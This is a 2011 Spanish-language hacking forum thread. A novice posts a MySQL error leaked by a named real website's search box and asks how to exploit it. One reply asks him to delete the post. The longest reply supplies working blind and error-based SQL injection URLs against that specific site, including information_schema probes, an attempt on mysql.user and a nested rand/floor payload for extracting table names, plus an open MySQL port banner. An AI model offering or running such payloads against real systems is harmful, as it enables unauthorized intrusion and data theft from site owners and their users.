He encontrado un bug, pero como explotarlo?

Iniciado por groted, 18 Julio 2011, 05:29 AM

0 Miembros y 1 Visitante están viendo este tema.

Imprimir
Ir Abajo Páginas1
Acciones del Usuario

groted

18 Julio 2011, 05:29 AM
Bueno soy muy novato etc etc....Y encontre un bug en una web que no para de atacarme.... es este:

Error en la consulta de conteo de registros: SELECT COUNT(*) FROM c_comunidades as co inner join c_categorias as ca ON ca.id_categoria=co.categoria WHERE (nombre LIKE '%'%' or descripcion LIKE '%'%') and eliminado='0' and categoria=' ' ORDER BY fecha desc, idco DESC . Mysql dijo: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%' or descripcion LIKE '%'%') and eliminado='0' and categoria=' ' ORDER BY fecha' at line 1

BUeno la web es www.onlypost.netel bug esta aqui http://comunidad.onlypost.net/comunidades/buscador-comunidades.php?q='

Lo consegui poniendo un ' en el buscador pero claro...... Ni idea de como explotarlo xd
Espero que me podais guiar.....

.:UND3R:.

#1
19 Julio 2011, 07:22 AM
Borra eso por favor, creo que es una injecciòn SQL

Solicitudes de crack, keygen, serial solo a través de mensajes privados (PM)

Shell Root

#2
19 Julio 2011, 08:54 AM
1. No DESCUBRISTE, estás usando un vulnerabilidad que es iSQL -ya existía hace mucho tiempo-.
2. Interfieres con la ejecución de la Query pero no puedes inyectar.
3. Quizás sea una blind.
Por eso no duermo, por si tras mi ventana hay un cuervo. Cuelgo de hilos sueltos sabiendo que hay veneno en el aire.

Space.Medafighter.X

#3
19 Julio 2011, 10:31 AM
Segúramente se refiere a que encontró un bug en el sitio web y por el contexto se asume que no "descubrió" el método, aunque igualmente considero absurdo discutir quién utilizó por primera vez un método tan elemental basado en el principio de inyección de código.

Fácilmente se puede explotar con substring, length, etc si lo que se pretende es leer datos específicos. La versión "5.0.92-community" tiene information_schema.tables.

http://comunidad.onlypost.net/comunidades/buscador/comunidades/?q='/**/AND/**/(SELECT/**/1/**/FROM/**/information_schema.tables/**/WHERE/**/substring(table_name,1,10)='collations'/**/LIMIT/**/0,1)='1&tipo_buscador2=temas&cat=-1

Da pereza extraer datos mediante blind por lo que también puedes generar mensajes de error -lástima que no puedas leer mysql.user y mucho menos en esta versión de MySQL- :

http://comunidad.onlypost.net/comunidades/buscador/comunidades/?q='/**/AND/**/(SELECT/**/1/**/FROM/**/mysql.user/**/LIMIT/**/0,1)='1&tipo_buscador2=temas&cat=-1

CitarSELECT command denied to user 'tumusica_new'@'localhost' for table 'user'

O conectarte al puerto de MySQL (el servidor lo tiene abierto) :

Citarcomunidad.onlypost.net [190.210.100.80] 3306 (?) open
>
5.0.92-community K÷é ^?]8?rD9 ,☻              207bheDa;D%'

O incluso generar mensajes de error para extraer datos : http://comunidad.onlypost.net/comunidades/buscador/comunidades/?q='/**/AND(SELECT/**/1/**/FROM(SELECT/**/count(*),concat((SELECT/**/(SELECT/**/(SELECT/**/distinct/**/concat(0x7e,0x27,unhex(Hex(cast(table_name/**/AS/**/char))),0x27,0x7e)/**/FROM/**/information_schema.tables/**/LIMIT/**/1,1))/**/FROM/**/information_schema.tables/**/LIMIT/**/0,1),floor(rand(0)*2))x/**/FROM/**/information_schema.tables/**/group/**/by/**/x)a)/**/AND/**/'1'='1&tipo_buscador2=temas&cat=-1
Imprimir
Ir Arriba Páginas1
Acciones del Usuario